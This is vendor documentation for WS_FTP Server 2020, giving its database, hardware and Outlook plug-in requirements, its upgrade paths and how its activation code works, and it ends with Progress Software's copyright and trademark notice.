WS\_FTP Server requires one of the database platforms listed in the following table.

The default database platform is PostgreSQL, however during installation, you can select Microsoft SQL Server as your database for configuration data.

*   PostgreSQL 10.20
*   Microsoft SQL Server 2017 Enterprise/Standard
*   Microsoft SQL Server 2016 Enterprise/Standard

**Framework and Accessibility**

WS\_FTP Server requires the Microsoft .NET Framework and other Microsoft packages for scripting and software accessibility. Microsoft .NET Framework 4.6 is included in the installation program.

**Hardware**

**Minimum requirements**

*   4-core server-class CPU (For example: Intel Xeon 4-core 2+GHz)
*   4 GB RAM
*   250 GB or larger free disk space, depending on estimated data to be stored
*   100/1000 MB Ethernet interface (for TCP/IP traffic)

**Ad Hoc Transfer Plug-in Requirements**

The following software must be installed on the machine on which you install the Ad Hoc Transfer Plug-in for Outlook.

*   Microsoft Outlook 2016, 2013, or 2010
*   Supported on Windows Operating Systems only.

**Note**: If you are running the installer live (not doing a silent install), the installer automatically installs the Microsoft Visual Studio redistributable programs. You do not need to download anything from Microsoft. If running a silent install, you must download and install these redistributable programs before running the install. See the Requirements in the Silent Install section.

**Note**: For silent installation instructions for the Ad Hoc Transfer Plug-in for Outlook, see Silent install of the Ad Hoc Transfer Plug-in for Outlook .

**Upgrading**

Upgrading to the latest version of WS\_FTP Server ensures that you have access to the latest features, fixes, security updates, and usability improvements.

WS\_FTP Server 2020.0.0 (8.7.0) supports direct upgrades from WS\_FTP Server 2017 Plus (8.5) and later. For more information, see Upgrade Paths.

**Upgrading information and considerations****Latest features and improvements**

For the most up-to-date information about the latest supported features and improvements, see What's New.

**Hardware Requirements**

Review the current WS\_FTP Server System Requirements.

**Activation code**

The activation code is automatically applied when you run the WS\_FTP Server installer to upgrade.

*   Your upgrade activation code is embedded in the installer file.
*   The activation code is also stored in the section of the Progress Community.
*   The activation code differs from your serial number. The code begins with your serial number and contains an additional eight characters.

**Support for older WS\_FTP Server Versions**

For information about support for previous versions of WS\_FTP Server, see the Product Lifecycle page on the Progress Community website. Customers running EOL or soon to be EOL versions should upgrade to WS\_FTP Server 2020.

**Upgrade Paths**

To upgrade from an earlier version of WS\_FTP Server to WS\_FTP Server 2020, you must download the installer file.

1.  Login to the Progress Community.
2.  Select .
3.  Locate and download your product. Your activation code is embedded in the download file, and is automatically applied during installation.

**Upgrade paths**

WS\_FTP Server 2020 supports direct upgrade installations from the following versions:

*   WS\_FTP Server 2018 (8.6)
*   WS\_FTP Server 2017 Plus (8.5)

**Note**: The upgrade paths are valid only on supported Operating Systems. For more information, see WS\_FTP Server System Requirements.

For detailed installation and configuration instructions, or activating a new or upgraded license, see the WS\_FTP Server Installation and Configuration Guide.

**Note**: If you upgrade from a version earlier than 2020, the default installation folders do not change. For example, the WS\_FTP Server installation folder will be C:\Program Files (x86)\Ipswitch\WS_FTP Server.

**Copyright Notice**

© 2022 Progress Software Corporation and/or one of its subsidiaries or affiliates. All rights reserved.

These materials and all Progress® software products are copyrighted and all rights are reserved by Progress Software Corporation. The information in these materials is subject to change without notice, and Progress Software Corporation assumes no responsibility for any errors that may appear therein. The references in these materials to specific platforms supported are subject to change.

Chef, Chef (and design), Chef Infra, Code Can (and design), Compliance at Velocity, Corticon, DataDirect (and design), DataDirect Cloud, DataDirect Connect, DataDirect Connect64, DataDirect XML Converters, DataDirect XQuery, DataRPM, Defrag This, Deliver More Than Expected, DevReach (and design), Icenium, Inspec, Ipswitch, iMacros, Kendo UI, Kinvey, MessageWay, MOVEit, NativeChat, NativeScript, OpenEdge, Powered by Chef, Powered by Progress, Progress, Progress Software Developers Network, SequeLink, Sitefinity (and Design), Sitefinity, Sitefinity (and design), SpeedScript, Stylus Studio, Stylized Design (Arrow/3D Box logo), Styleized Design (C Chef logo), Stylized Design of Samurai, TeamPulse, Telerik, Telerik (and design), Test Studio, WebSpeed, WhatsConfigured, WhatsConnected, WhatsUp, and WS\_FTP are registered trademarks of Progress Software Corporation or one of its affiliates or subsidiaries in the U.S. and/or other countries.

Analytics360, AppServer, BusinessEdge, Chef Automate, Chef Compliance, Chef Desktop, Chef Habitat, Chef WorkStation, Corticon.js, Corticon Rules, Data Access, DataDirect Autonomous REST Connector, DataDirect Spy, DevCraft, Fiddler, Fiddler Everywhere, FiddlerCap, FiddlerCore, FiddlerScript, Hybrid Data Pipeline, iMail, JustAssembly, JustDecompile, JustMock, KendoReact, NativeScript Sidekick, OpenAccess, PASOE, Pro2, ProDataSet, Progress Results, Progress Software, ProVision, PSE Pro, Push Jobs, SafeSpaceVR, Sitefinity Cloud, Sitefinity CMS, Sitefinity Digital Experience Cloud, Sitefinity Feather, Sitefinity Insight, Sitefinity Thunder, SmartBrowser, SmartComponent, SmartDataBrowser, SmartDataObjects, SmartDataView, SmartDialog, SmartFolder, SmartFrame, SmartObjects, SmartPanel, SmartQuery, SmartViewer, SmartWindow, Supermarket, SupportLink, Unite UX, and WebClient are trademarks or service marks of Progress Software Corporation and/or its subsidiaries or affiliates in the U.S. and other countries. Java is a registered trademark of Oracle and/or its affiliates. Any other marks contained herein may be trademarks of their respective owners.

This document was published on 10 August 2022 at 13:25

Tag

#windows